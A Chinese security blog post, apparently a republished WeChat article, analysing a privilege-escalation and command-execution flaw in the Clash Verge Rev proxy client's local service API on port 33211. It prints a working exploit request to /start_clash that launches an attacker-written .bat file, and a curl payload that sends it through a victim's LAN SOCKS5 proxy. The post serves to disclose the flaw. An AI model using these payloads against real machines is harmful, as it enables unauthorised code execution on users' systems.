Clash Verge rev提权与命令执行分析

admin 2025年5月9日16:26:10评论13 views字数 2252阅读7分30秒阅读模式

扫码领资料

获网安教程

Clash Verge rev提权与命令执行分析
Clash Verge rev提权与命令执行分析

本文由掌控安全学院 -  c's 投稿

Track安全社区投稿~  

千元稿费!还有保底奖励~( https://bbs.zkaq.cn)

一、基本信息

1.1、漏洞背景

复现时间:20250429

背景:

https://github.com/clash-verge-rev/clash-verge-rev/issues/3428

Clash Verge rev提权与命令执行分析

1.2、clash生态

1. Clash内核●Clash是一个开源、跨平台的规则分流代理内核,用Go语言开发,核心功能是多协议代理(如VMess、VLESS、Trojan、Shadowsocks、Socks5、HTTP等)+强大的规则分流。

本质:命令行程序,无GUI,负责流量抓取、转发、分流、协议转换等。配置:通过YAML文件配置,支持多节点、多规则、多策略组。功能:分流、UDP/IPv6支持、透明代理、DNS伪装、测速、订阅等。2. Clash GUI生态Clash for WindowsClashX(Mac)Clash Verge/Verge RevMeta、Meta for Android等,都是基于Clash内核的图形界面前端,用来简化配置、管理和可视化操作。1.3、Clash Verge Rev是什么1. Clash Verge Rev简介Clash Verge Rev是一款基于Clash内核的跨平台GUI客户端。Verge Rev=Verge的分支/二开版本,通常会有更多新特性、优化和自定义功能。支持Windows、MacOS、Linux等,界面现代、交互友好。2. 架构前端(GUI):负责用户交互、配置管理、节点展示、规则编辑、流量统计等。后端(内核):集成Clash核心程序,负责实际的流量抓取、协议解析与分流。通信:前端通过API/本地端口与Clash内核通信(如RESTful API、WebSocket)。1.4、clash Verge Rev的安全性与架构GUI和内核分离:理论上GUI和内核可以独立升级,安全性更好。开源可审计:代码开源,安全人员可自行审计有无后门。GUI前端:用户操作界面clash-verge-service:本地服务进程,管理内核和提供接口Clash内核:真正的网络代理引擎1.5、监听端口clash系列都差不多,常见clash的配置文件:clash-verge-service监听端口:小结一下,

端口号

作用

进程

7890、7891

代理流量端口(HTTP/SOCKS5)

clash-core/meta

9090

内核 API(external-controller)

clash-core/meta

33211

clash-verge-service 的本地API端口

clash-verge-service

数据流向:二、漏洞1、提权详细请求数据包,查看日志文件,提权成功

Clash Verge rev提权与命令执行分析

辅助测试go程序,代码,代码入口,

Clash Verge rev提权与命令执行分析

写入配置,

Clash Verge rev提权与命令执行分析

这里可以实现任意文件写入,配合多种姿势rce

Clash Verge rev提权与命令执行分析

针对mac和非mac文件都可以,

Clash Verge rev提权与命令执行分析

2、转换系统rce复现,代码已经写得很详细了。由于参数不完全可控,RCE 部分会复杂一些。可以考虑这样处理:先发送一个请求,把要执行的命令写入 bat 文件,再通过第二个请求调用这个文件即可。该思路可以用于win和mac。详细请求数据包,写入成功

Clash Verge rev提权与命令执行分析

第二次请求,

Clash Verge rev提权与命令执行分析

详细请求数据包

POST /start_clash HTTP/1.1Host: 127.0.0.1:33211Content-Type: application/json{"bin_path""d:/clash.bat","config_dir"".","config_file"".","log_file""d:/clash.log"}

3、进一步利用这个漏洞的影响范围可以更广。特别是当用户在与攻击者相同的局域网环境中开启了局域网功能时,攻击者可以利用clash的代理机制发起直接攻击。payload:

curl -x socks5://192.168.xx.xx:xx -X POST "http://127.0.0.1:33211/start_clash" -H "Content-Type: application/json" -d '{  "bin_path""xx",  "config_dir""xx",  "config_file""xx",  "log_file""xx"}'

进一步扩大危害的可能?简单来说,这个漏洞可以集成到蜜罐中,当“攻击者”用受影响的clash访问蜜罐时,蜜罐可以自动发起前述两个请求,实现对攻击者的反制。但是经测试未成功,原因是发起JSON格式的POST请求需要CORS支持,这个方案目前行不通。

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

Clash Verge rev提权与命令执行分析

没看够~?欢迎关注!

分享本文到朋友圈,可以凭截图找老师领取

上千教程+工具+交流群+靶场账号

Clash Verge rev提权与命令执行分析

分享后扫码加我

回顾往期内容

零基础学黑客,该怎么学?

网络安全人员必考的几本证书!

文库|内网神器cs4.0使用说明书

记某地级市护网的攻防演练行动

手把手教你CNVD漏洞挖掘 + 资产收集

【精选】SRC快速入门+上分小秘籍+实战指南

    代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!

Clash Verge rev提权与命令执行分析

点赞+在看支持一下吧~感谢看官老爷~ 

你的点赞是我更新的动力

原文始发于微信公众号(sec0nd安全):Clash Verge rev提权与命令执行分析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月9日16:26:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Clash Verge rev提权与命令执行分析http://cn-sec.com/archives/4046801.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息